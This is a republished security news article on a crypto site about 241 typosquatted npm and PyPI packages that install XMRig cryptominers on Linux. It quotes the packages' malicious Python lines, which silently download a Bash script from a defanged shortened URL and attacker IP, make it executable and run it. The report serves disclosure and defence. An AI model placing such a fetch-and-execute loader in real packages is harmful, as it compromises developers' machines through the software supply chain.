Tuesday, January 31, 2023
DLTEMPIRE
  • Home
  • News
  • Blockchain
  • Ethereum
  • BNB
  • Binance
  • Luna Crash
  • Crypto Mining
  • DeFi
  • ICO
  • Regulation
  • Top 10 coins
No Result
View All Result
  • Home
  • News
  • Blockchain
  • Ethereum
  • BNB
  • Binance
  • Luna Crash
  • Crypto Mining
  • DeFi
  • ICO
  • Regulation
  • Top 10 coins
No Result
View All Result
DLTEMPIRE
No Result
View All Result
Home Crypto Mining

241 npm and PyPI packages caught dropping Linux cryptominers

Lucinda Keatinge by Lucinda Keatinge
August 20, 2022
in Crypto Mining
0
241 npm and PyPI packages caught dropping Linux cryptominers
0
SHARES
0
VIEWS
Share on FacebookShare on Twitter


crypomining

More than 200 malicious packages have been discovered infiltrating the PyPI and npm open source registries this week.

These packages are largely typosquats of widely used libraries and each one of them downloads a Bash script on Linux systems that run cryptominers.

PyPI, npm flooded with cryptomining packages

Researchers have caught at least 241 malicious npm and PyPI packages that drop cryptominers after infecting Linux machines.

These packages are typosquats of popular open source libraries and commands like React, argparse, and AIOHTTP, but instead, download and install cryptomining Bash scripts from the threat actor’s server.

On Wednesday, software developer and researcher Hauke Lübbers shared coming across “at least 33 projects” on PyPI that all launched XMRig, an open source Monero cryptominer, after infecting a system.

pypi cryptominers
55 typosquats laced with cryptominers flood PyPI (Hauke Lübbers)

While the researcher was in the process of reporting these 33 malicious projects to PyPI admins, he noticed the threat actor began publishing another set of 22 packages with the same malicious payload.

“After I reported them to PyPI, they were quickly deleted – but the malicious actor was still in the process of uploading more packages, and uploaded another 22,” Lübbers tells BleepingComputer.

“The packages targeted Linux systems and installed crypto mining software XMRig,” explains the software engineer.

The Python packages contain the following piece of code that downloads the Bash script from the threat actor’s server via Bit.ly URL shortener.

os.system(“sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1”)
os.system(“chmod +x .cmc >/dev/null 2>&1”)
os.system(“./.cmc >/dev/null 2>&1”)

The researcher explains the Bit[.]ly URL redirects to the script hosted on 80.78.25[.]140:8000.

“This was done by downloading and executing the Bash script from http://80.78.25[.]140:8000/.cmc”

Upon execution, the script notifies the threat actor of the IP address of the compromised host and if the deployment of cryptominers succeeded.

At the time of writing, we observed the IP address was down. But, BleepingComputer was able to obtain a copy of the script and we are able to confirm the researcher’s claims:

Bash script installing cryptominers
Excerpt from Bash script installing cryptominers (BleepingComputer)

The Sonatype security research team that I’m a part of, disclosed another 186 npm typosquatting packages today making contact with the same URL to download the malicious Bash script.

malicious code seen in npm packages
npm packages pull malicious code from the same URL (Sonatype)

It appears that both registries cleared the typosquats fairly quickly from their platforms before these could do more harm to developers.

Despite various security enhancements, like mandating two-factor authentication for critical projects and introducing new features (like Python’s setuptools moving towards replacing setup.py), it seems the open source repository’s race against threat actors is only getting even more challenging.

Last week, software security company Checkmarx reported discovering a dozen malicious Python packages performing DDoS attacks on Counter-Strike servers.

Earlier this month, cybersecurity firm CheckPoint outed 10 malicious PyPI packages caught stealing developer credentials.

In July, ReversingLabs researchers disclosed a supply chain attack dubbed IconBurst that once again, exploited typosquatting to infect developers.





Source link

Tags: CaughtcryptominersdroppingLinuxnpmpackagesPyPI
Previous Post

Does Quilvius have the potential to match Ethereum as a successful crypto?

Next Post

RoboApe, Uniswap, and Shiba Inu – CryptoMode

Lucinda Keatinge

Lucinda Keatinge

Next Post
RoboApe, Uniswap, and Shiba Inu – CryptoMode

RoboApe, Uniswap, and Shiba Inu – CryptoMode

  • Trending
  • Comments
  • Latest
Veteran pilot killed in vintage airplane crash in Kern County

Veteran pilot killed in vintage airplane crash in Kern County

September 3, 2022
Wells Fargo Mentioned Ripple (XRP) As A Digital Currency In August Report

Wells Fargo Mentioned Ripple (XRP) As A Digital Currency In August Report

August 16, 2022
Sold Out Presale Creating Huge Interest In Gnox (GNOX) From Binance Coin (BNB) And PancakeSwap (CAKE) Holders

Sold Out Presale Creating Huge Interest In Gnox (GNOX) From Binance Coin (BNB) And PancakeSwap (CAKE) Holders

August 16, 2022
Best Coins To Buy On PancakeSwap App In August 2022

Best Coins To Buy On PancakeSwap App In August 2022

August 12, 2022
How the Stance of World’s Top Crypto Exchange Could Impact Possibility of Future Ethereum Forks

How the Stance of World’s Top Crypto Exchange Could Impact Possibility of Future Ethereum Forks

0
Binance, Mastercard launch prepaid card in Argentina to bridge cryptocurrencies, everyday purchases

Binance, Mastercard launch prepaid card in Argentina to bridge cryptocurrencies, everyday purchases

0
What is Alpaca Finance? – Asia Crypto Today

What is Alpaca Finance? – Asia Crypto Today

0
Blockchain ETF’s Top Holding Has Been a Strong Outperformer

Blockchain ETF’s Top Holding Has Been a Strong Outperformer

0
How to Import Crypto.com DeFi Wallet Into MetaMask

Meet the Top DeFi Protocols on the Aptos Blockchain

January 31, 2023
US authorities sound alarm on crypto, issue warning to banks about risks

Economic Survey stresses common approach to crypto regulation- The New Indian Express

January 31, 2023
2023 Juno Awards nominations: The Weeknd leads the pack with 6

2023 Juno Awards nominations: The Weeknd leads the pack with 6

January 31, 2023
BuzzFeed Shares Soar 300% After Company Announced Plans for AI Content

BuzzFeed Shares Soar 300% After Company Announced Plans for AI Content

January 31, 2023

Recent News

How to Import Crypto.com DeFi Wallet Into MetaMask

Meet the Top DeFi Protocols on the Aptos Blockchain

January 31, 2023
US authorities sound alarm on crypto, issue warning to banks about risks

Economic Survey stresses common approach to crypto regulation- The New Indian Express

January 31, 2023
2023 Juno Awards nominations: The Weeknd leads the pack with 6

2023 Juno Awards nominations: The Weeknd leads the pack with 6

January 31, 2023
BuzzFeed Shares Soar 300% After Company Announced Plans for AI Content

BuzzFeed Shares Soar 300% After Company Announced Plans for AI Content

January 31, 2023

Recent News

How to Import Crypto.com DeFi Wallet Into MetaMask

Meet the Top DeFi Protocols on the Aptos Blockchain

January 31, 2023
US authorities sound alarm on crypto, issue warning to banks about risks

Economic Survey stresses common approach to crypto regulation- The New Indian Express

January 31, 2023

Categories

  • Altcoin
  • Artificial Intelligence
  • Binance
  • Blockchain
  • BNB
  • Business
  • Crypto Mining
  • DeFi
  • Ethereum
  • Featured
  • ICO
  • Luna Crash
  • Metaverse
  • News
  • Regulation
  • Top 10 coins
  • Uncategorized

Follow Us

Follow Us

Find Via Tags

Big Binance Bitcoin Blockchain BNB BTC Buy Cardano CEO Chain Coin CoinDesk Coins crash Crypto Cryptocurrency DeFi Digital Dogecoin ETH Ethereum Exchange eyes Finance FTX Heres Investors latest LUNA Market Merge Million mining Network News NFT Prediction Price Protocol Regulation Solana Token Top Tweet Week

© 2021 Dltempire

No Result
View All Result
  • Home
  • News
  • Blockchain
  • Ethereum
  • BNB
  • Binance
  • Luna Crash
  • Crypto Mining
  • DeFi
  • ICO
  • Regulation
  • Top 10 coins

© 2021 Dltempire